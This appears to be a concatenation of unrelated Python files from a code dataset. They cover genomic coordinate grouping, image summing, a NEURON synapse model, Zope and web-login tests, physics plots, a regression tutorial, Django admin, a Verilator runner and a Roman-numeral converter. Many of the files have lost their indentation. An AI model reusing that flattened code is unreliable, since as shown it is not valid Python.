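    SudokuGenomicCoord(1000, 'unambiguous', 1.0, 10), \
    SudokuGenomicCoord(1001, 'ambiguous', 0.5, 2), \
    SudokuGenomicCoord(1002, 'unambiguous', 0.9, 4), \
    SudokuGenomicCoord(5000, 'unambiguous', 1.0, 7)]
    groupedCoords = GroupSudokuGenomicCoords(coords, maxGap=2)
    # Expected: two entries, the first merged (readCount 16, locatability 'unambiguous'),
    # the second the untouched coordinate at 5000.
    return groupedCoords
# ------------------------------------------------------------------------------------------------ #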
# ------------------------------------------------------------------------------------------------ #
def GroupReadAlignmentCoordsInSudokuGrid(sudokuGridLookupDict, prPools, pcPools, rowPools, \
colPools, maxGap=4):
import operator
for prPool in prPools:
for pcPool in pcPools:
sudokuPlate = None
try:
sudokuPlate = sudokuGridLookupDict[prPool][pcPool]
except (KeyError, IndexError):
print('No plate at: ' + prPool + '_' + pcPool)
pass
if sudokuPlate != None:
plateName = sudokuPlate.plateName
for colPool in colPools:
for rowPool in rowPools:
sudokuWell = sudokuPlate.wellGrid[rowPool][colPool]
readAlignmentCoords = sudokuWell.readAlignmentCoords
readAlignmentCoords = sorted(readAlignmentCoords, \
key=operator.attrgetter('coord'))
groupedReadAlignmentCoords = GroupSudokuGenomicCoords(readAlignmentCoords, \
maxGap=maxGap)
sudokuWell.readAlignmentCoords = groupedReadAlignmentCoords
# ------------------------------------------------------------------------------------------------ #
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
import os
def join_images(images):
    rows = len(images[0])
    cols = len(images[0][0])
    final_image = np.zeros((rows, cols, 1), np.uint8)
    print(len(images))
    for img in images:
        for row in range(0, len(final_image)):
            for col in range(0, len(final_image[0])):
                final_image[row][col] += img[row][col]
    return final_image
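# A vectorized alternative sketch (assumption: all input images share the same size and the intent
# is the same element-wise uint8 summation, with its wrap-around overflow, as join_images above).
def join_images_vectorized(images):
    # Sum along the stack axis (numpy promotes the accumulator), then cast back to uint8,
    # which reduces the total modulo 256 just like the repeated uint8 additions above.
    return np.sum(np.stack(images, axis=0), axis=0).astype(np.uint8)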
def main():
    path = os.getcwd() + "\\Test"
    dirs = [f for f in os.listdir(path) if not f.endswith('bmpfinal.bmp')]
    print(dirs)
    for d in dirs:
        files = [f for f in os.listdir(path + "\\" + d) if f.endswith('_.bmp')]
        images = []
        for f in files:
            print(path + "\\" + d + "\\" + f)
            mat = cv2.imread(path + "\\" + d + "\\" + f, cv2.IMREAD_GRAYSCALE)
            images.append(mat)
        for i in range(0, 8):
            decoded_image = join_images(images[i:8])
            cv2.imwrite(path + "\\" + d + "\\" + "rec{}.bmp".format(i), decoded_image)
if __name__ == "__main__":
    main()
|
python
|
_mod_txt = """
NEURON {
POINT_PROCESS ExpSynMorphforge
RANGE tau, e, i
NONSPECIFIC_CURRENT i
RANGE peak_conductance
}
UNITS {
(nA) = (nanoamp)
(mV) = (millivolt)
(uS) = (microsiemens)
}
PARAMETER {
tau = 0.1 (ms) <1e-9,1e9>
e = 0 (mV)
peak_conductance = -100000 ()
}
ASSIGNED {
v (mV)
i (nA)
}
STATE {
g (uS)
}
INITIAL {
g=0
}
BREAKPOINT {
SOLVE state METHOD cnexp
i = g*(v - e)
}
DERIVATIVE state {
g' = -g/tau
}
UNITSOFF
NET_RECEIVE(weight (uS)) {
weight = 1.0
g = g + weight * peak_conductance
}
UNITSON
"""
def getExpSynModfile():
return _mod_txt
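# A minimal usage sketch (assumption: the text above is meant to be written out as an
# ExpSynMorphforge.mod file and compiled with NEURON's nrnivmodl before the point process can be
# instantiated). The helper name and directory argument are choices made for this example.
def writeExpSynModfile(directory):
    import os
    path = os.path.join(directory, 'ExpSynMorphforge.mod')
    with open(path, 'w') as f:
        f.write(getExpSynModfile())
    return path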
|
python
|
##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Remote Task test setup
"""
__docformat__ = "reStructuredText"
from Testing import ZopeTestCase
from zope.testing.doctest import INTERPRET_FOOTNOTES
from zope.testing.loggingsupport import InstalledHandler
import doctest
import random
import unittest
import logging
from five.taskqueue import service
ZopeTestCase.installProduct('Five')
def _configure_conflict_error_log_level():
import App.config
config = App.config.getConfiguration()
config.conflict_error_log_level = logging.INFO
App.config.setConfiguration(config)
def setUp(test):
test.globs['root'] = ZopeTestCase.base.app()
# As task will be run in different threads, we cannot rely on print
# results. We need to log calls to prove correctness.
log_info = InstalledHandler('z3c.taskqueue')
test.globs['log_info'] = log_info
# We pass the ZPublisher conflict logger to prove that no conflict
# happened.
conflict_logger = InstalledHandler('ZPublisher.Conflict')
test.globs['conflict_logger'] = conflict_logger
# Make sure ZPublisher conflict error log level is setup.
_configure_conflict_error_log_level()
test.origArgs = service.TaskService.processorArguments
service.TaskService.processorArguments = {'waitTime': 0.0}
# Make tests predictable
random.seed(27)
def tearDown(test):
random.seed()
service.TaskService.processorArguments = test.origArgs
class TestIdGenerator(unittest.TestCase):
def setUp(self):
random.seed(27)
self.service = service.TaskService()
def tearDown(self):
random.seed()
def test_sequence(self):
id = 1392637175
self.assertEquals(id, self.service._generateId())
self.assertEquals(id + 1, self.service._generateId())
self.assertEquals(id + 2, self.service._generateId())
self.assertEquals(id + 3, self.service._generateId())
def test_in_use_randomises(self):
id = 1392637175
self.assertEquals(id, self.service._generateId())
self.service.jobs[id + 1] = object()
id = 1506179619
self.assertEquals(id, self.service._generateId())
self.assertEquals(id + 1, self.service._generateId())
self.service.jobs[id + 1] = object()
self.assertEquals(id + 2, self.service._generateId())
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(TestIdGenerator),
ZopeTestCase.ZopeDocFileSuite('processor.txt',
package='five.taskqueue.tests',
setUp=setUp,
tearDown=tearDown,
optionflags=doctest.NORMALIZE_WHITESPACE
| doctest.ELLIPSIS
| INTERPRET_FOOTNOTES),
))
|
python
|
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import requests
import time
import unittest
from bs4 import BeautifulSoup
from object_database.service_manager.ServiceManager import ServiceManager
from object_database.web.ActiveWebService import (
active_webservice_schema,
ActiveWebService,
User
)
from object_database import core_schema, connect, service_schema
from object_database.util import configureLogging, genToken
from object_database.test_util import autoconfigure_and_start_service_manager, currentMemUsageMb
ownDir = os.path.dirname(os.path.abspath(__file__))
ownName = os.path.basename(os.path.abspath(__file__))
DATABASE_SERVER_PORT=8023
WEB_SERVER_PORT=8025
class ActiveWebServiceTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.cleanupFn = lambda error=None: None
cls.base_url = "http://localhost:{port}".format(port=WEB_SERVER_PORT)
configureLogging("aws_test")
cls._logger = logging.getLogger(__name__)
def configurableSetUp(self, auth_type="LDAP",
auth_hostname=None, authorized_groups=(),
ldap_base_dn=None, ldap_ntlm_domain=None,
company_name=None):
self.token = genToken()
log_level = self._logger.getEffectiveLevel()
loglevel_name = logging.getLevelName(log_level)
self.server, self.cleanupFn = autoconfigure_and_start_service_manager(
port=DATABASE_SERVER_PORT,
auth_token=self.token,
loglevel_name=loglevel_name)
try:
self.database = connect("localhost", DATABASE_SERVER_PORT, self.token, retry=True)
self.database.subscribeToSchema(core_schema, service_schema, active_webservice_schema)
with self.database.transaction():
service = ServiceManager.createOrUpdateService(ActiveWebService, "ActiveWebService", target_count=0)
optional_args = []
if len(authorized_groups) > 0:
optional_args.extend(['--authorized-groups', *authorized_groups])
if auth_hostname:
optional_args.extend(['--auth-hostname', auth_hostname])
if ldap_base_dn:
optional_args.extend(['--ldap-base-dn', ldap_base_dn])
if ldap_ntlm_domain:
optional_args.extend(['--ldap-ntlm-domain', ldap_ntlm_domain])
if company_name:
optional_args.extend(['--company-name', company_name])
ActiveWebService.configureFromCommandline(
self.database,
service,
[
'--port', str(WEB_SERVER_PORT),
'--host', 'localhost',
'--log-level', loglevel_name,
'--auth', auth_type
] + optional_args
)
with self.database.transaction():
ServiceManager.startService("ActiveWebService", 1)
self.waitUntilUp()
except Exception:
self.cleanupFn(error=True)
raise
def waitUntilUp(self, timeout = 2.0):
t0 = time.time()
while time.time() - t0 < timeout:
try:
res = requests.get(self.base_url + "/login")
return
except Exception:
time.sleep(.5)
raise Exception("Webservice never came up.")
def tearDown(self):
self.cleanupFn()
def login(self, client, username='anonymous', password='bogus'):
# Because of CSRF security we need to do the following to authenticate:
# - Load the login page
# - Extract the csrf token (using BeautifulSoup)
# - Issue a POST request to the login endpoint that includes the CSRF token
login_url = self.base_url + "/login"
res = client.get(login_url)
self.assertFalse(res.history)
self.assertEqual(res.status_code, 200)
soup = BeautifulSoup(res.text, 'html.parser')
csrf_token = soup.find('input', dict(name='csrf_token'))['value']
res = client.post(login_url, data=dict(username=username, password=password, csrf_token=csrf_token))
self.assertTrue(res.history)
self.assertEqual(res.status_code, 200)
self.assertTrue('login' not in res.url)
def test_web_service_no_auth(self):
self.configurableSetUp(auth_type="NONE")
url = self.base_url + "/content/object_database.css"
client = requests.Session()
res = client.get(url)
self.assertTrue(res.history) # first time around we WILL get redirects
self.assertEqual(res.status_code, 200)
res = client.get(url)
self.assertFalse(res.history) # second time around we will NOT get redirects
self.assertEqual(res.status_code, 200)
self.assertEqual(res.url, url)
def test_web_service_login_and_access(self):
self.configurableSetUp(auth_type="PERMISSIVE")
url = self.base_url + "/content/object_database.css"
client = requests.Session()
username = 'anonymous'
# 1. Cannot access without login
res = requests.get(url)
self.assertTrue(res.history)
self.assertEqual(len(res.history), 1)
self.assertEqual(res.status_code, 200)
self.assertNotEqual(res.url, url)
self.assertTrue('login' in res.url)
# 2. login successfully
self.login(client, username)
# 3. now we can access our target page
res = client.get(url)
self.assertFalse(res.history)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.url, url)
# 4. test that we get auto-logged-out by modifying the user in object DB
with self.database.transaction():
user = User.lookupAny(username=username)
if user:
user.logout()
res = client.get(url)
self.assertTrue(res.history)
self.assertEqual(res.status_code, 200)
self.assertTrue('login' in res.url)
|
python
|
#!/usr/bin/env python
"""
read ntuple produced by Truth_JETMET...
make some validation plots
"""
import ROOT
ROOT.gROOT.SetBatch()
from optparse import OptionParser
def make_plots(file_name, post_fix):
import AtlasStyle
f1 = ROOT.TFile.Open(file_name)
tree = f1.Get("physics")
h_m4l = ROOT.TH1F("h_m4l", "m4l;m_{4l} [GeV];Events/2 GeV", 100, 100, 600)
h_mZ1 = ROOT.TH1F("h_mZ1", "mZ1;m_{Z1} [GeV];Events/1 GeV", 70, 30, 110)
h_mZ2 = ROOT.TH1F("h_mZ2", "mZ2;m_{Z2} [GeV];Events/2 GeV", 60, 0, 120)
h_Z1_lepplus_pt = ROOT.TH1F("h_Z1_lepplus_pt", "Z1_lepplus_pt;l^{+} of Z1 p_{T} [GeV];Events/4 GeV", 35, 0, 140)
h_Z2_lepplus_pt = ROOT.TH1F("h_Z2_lepplus_pt", "Z2_lepplus_pt;l^{+} of Z2 p_{T} [GeV];Events/4 GeV", 35, 0, 140)
h_Z1_lepminus_pt = ROOT.TH1F("h_Z1_lepminus_pt", "Z1_lepminus_pt;l^{-} of Z1 p_{T} [GeV];Events/ 4 GeV", 35, 0, 140)
h_Z2_lepminus_pt = ROOT.TH1F("h_Z2_lepminus_pt", "Z2_lepminus_pt;l^{-} of Z2 p_{T} [GeV];Events/ 4 GeV", 35, 0, 140)
tree.Draw("m4l/1E3>>"+h_m4l.GetName(), "")
tree.Draw("mZ1/1E3>>"+h_mZ1.GetName(), "")
tree.Draw("mZ2/1E3>>"+h_mZ2.GetName(), "")
tree.Draw("Z1_lepplus_pt/1E3>>"+h_Z1_lepplus_pt.GetName(), "")
tree.Draw("Z2_lepplus_pt/1E3>>"+h_Z2_lepplus_pt.GetName(), "")
tree.Draw("Z1_lepminus_pt/1E3>>"+h_Z1_lepminus_pt.GetName(), "")
tree.Draw("Z2_lepminus_pt/1E3>>"+h_Z2_lepminus_pt.GetName(), "")
canvas = ROOT.TCanvas("canvas", "canvas", 600, 600)
hists = [h_m4l, h_mZ1, h_mZ2, h_Z1_lepplus_pt, h_Z2_lepplus_pt, h_Z1_lepminus_pt, h_Z2_lepminus_pt]
for hist in hists:
hist.Draw()
canvas.SaveAs(post_fix+"_"+hist.GetName()+".pdf")
if __name__ == "__main__":
usage = "%prog file_name out_tag"
parser = OptionParser(usage=usage, description="read truth file, plot basic variables")
(options, args) = parser.parse_args()
if len(args) < 2:
parser.print_help()
exit(1)
file_ = args[0]
out_ = args[1]
make_plots(file_, out_)
|
python
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
cd=os.path.join('LinearRegression','Kidem_ve_Maas_VeriSeti.csv')
dataset = pd.read_csv(cd)
print(dataset.describe())
x=dataset.iloc[:,:-1].values
y=dataset.iloc[:,1].values
# sklearn.cross_validation was removed in newer scikit-learn releases; model_selection replaces it
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=1/3,random_state=0)
## Train the model
from sklearn.linear_model import LinearRegression
regressor=LinearRegression()
regressor.fit(x_train,y_train)
y_pred=regressor.predict(x_test)
#visualize
plt.scatter(x_train,y_train,color='red')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
plt.scatter(x_train,y_train,color='red')
modelin_tahmin_ettigi_y=regressor.predict(x_train)
plt.scatter(x_train,modelin_tahmin_ettigi_y,color='blue')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
plt.scatter(x_train,y_train,color='red')
modelin_tahmin_ettigi_y=regressor.predict(x_train)
plt.plot(x_train,modelin_tahmin_ettigi_y,color='blue')
plt.title('Kıdeme göre maaş tahmini regresyon modeli')
plt.xlabel('Kıdem')
plt.ylabel('Maaş')
plt.show()
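# A small evaluation sketch (added as an illustration, not part of the original script): report the
# fitted line's parameters and its R^2 score on the held-out test set.
from sklearn.metrics import r2_score
print('slope:', regressor.coef_)
print('intercept:', regressor.intercept_)
print('test R^2:', r2_score(y_test, y_pred))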
|
python
|
#__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
from django.contrib import admin
from xgds_map_server import models
class KmlMapAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'openable',
'visible',
'kmlFile',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description',
'kmlFile')
class MapLayerAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'visible',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description')
class MapGroupAdmin(admin.ModelAdmin):
list_display = ('uuid',
'name',
'parent',
'description')
list_editable = list_display[1:]
ordering = ('parent', 'name')
search_fields = ('name',
'description')
admin.site.register(models.KmlMap, KmlMapAdmin)
admin.site.register(models.MapGroup, MapGroupAdmin)
admin.site.register(models.MapLayer, MapLayerAdmin)
#TODO make admin classes for other map layer stuff below
admin.site.register(models.MapTile)
admin.site.register(models.WMSTile, MapLayerAdmin)
admin.site.register(models.WMTSTile, MapLayerAdmin)
admin.site.register(models.GroundOverlayTime, MapLayerAdmin)
admin.site.register(models.GeoJSON)
admin.site.register(models.Place)
admin.site.register(models.Geotiff)
|
python
|
__author__ = 'Jeremy'
|
python
|
#!/bin/false python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 The SymbiFlow Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import os
import shutil
from BaseRunner import BaseRunner
class Verilator(BaseRunner):
def __init__(self):
super().__init__("verilator", "verilator")
self.url = "https://verilator.org"
def prepare_run_cb(self, tmp_dir, params):
mode = params['mode']
conf = os.environ['CONF_DIR']
scr = os.path.join(tmp_dir, 'scr.sh')
shutil.copy(os.path.join(conf, 'runners', 'vmain.cpp'), tmp_dir)
build_dir = 'vbuild'
build_exe = 'vmain'
with open(scr, 'w') as f:
f.write('set -x\n')
f.write('{0} $@ || exit $?\n'.format(self.executable))
if mode == 'simulation':
f.write('make -C {} -f Vtop.mk\n'.format(build_dir))
f.write('./vbuild/{}'.format(build_exe))
# verilator executable is a script but it doesn't
# have shell shebang on the first line
self.cmd = ['sh', 'scr.sh']
if mode == 'simulation':
self.cmd += ['--cc']
elif mode == 'preprocessing':
self.cmd += ['-E']
else:
self.cmd += ['--lint-only']
self.cmd += ['-Wno-fatal', '-Wno-UNOPTFLAT', '-Wno-BLKANDNBLK']
# Flags for compliance testing:
self.cmd += ['-Wpedantic', '-Wno-context']
if params['top_module'] != '':
self.cmd.append('--top-module ' + params['top_module'])
if mode == 'preprocessing':
self.cmd += ['-P', '-E']
for incdir in params['incdirs']:
self.cmd.append('-I' + incdir)
if mode == 'simulation':
self.cmd += [
'--Mdir', build_dir, '--prefix', 'Vtop', '--exe', '-o',
build_exe
]
self.cmd.append('vmain.cpp')
if 'runner_verilator_flags' in params:
self.cmd += [params['runner_verilator_flags']]
for define in params['defines']:
self.cmd.append('-D' + define)
self.cmd += params['files']
|
python
|
class Solution:
    def intToRoman(self, num):
        # Convert one decimal digit to Roman numerals, given the symbols for
        # 1x, 5x and 10x of its place value.
        def get_representation(digit, one, five, ten):
            if digit < 4:
                return one * digit
            if digit == 4:
                return one + five
            if digit < 9:
                return five + one * (digit - 5)
            return one + ten
        thousands = "M" * (num // 1000)
        hundreds = get_representation((num // 100) % 10, "C", "D", "M")
        tens = get_representation((num // 10) % 10, "X", "L", "C")
        ones = get_representation(num % 10, "I", "V", "X")
        # Example: 1994 -> "MCMXCIV"
        return thousands + hundreds + tens + ones
|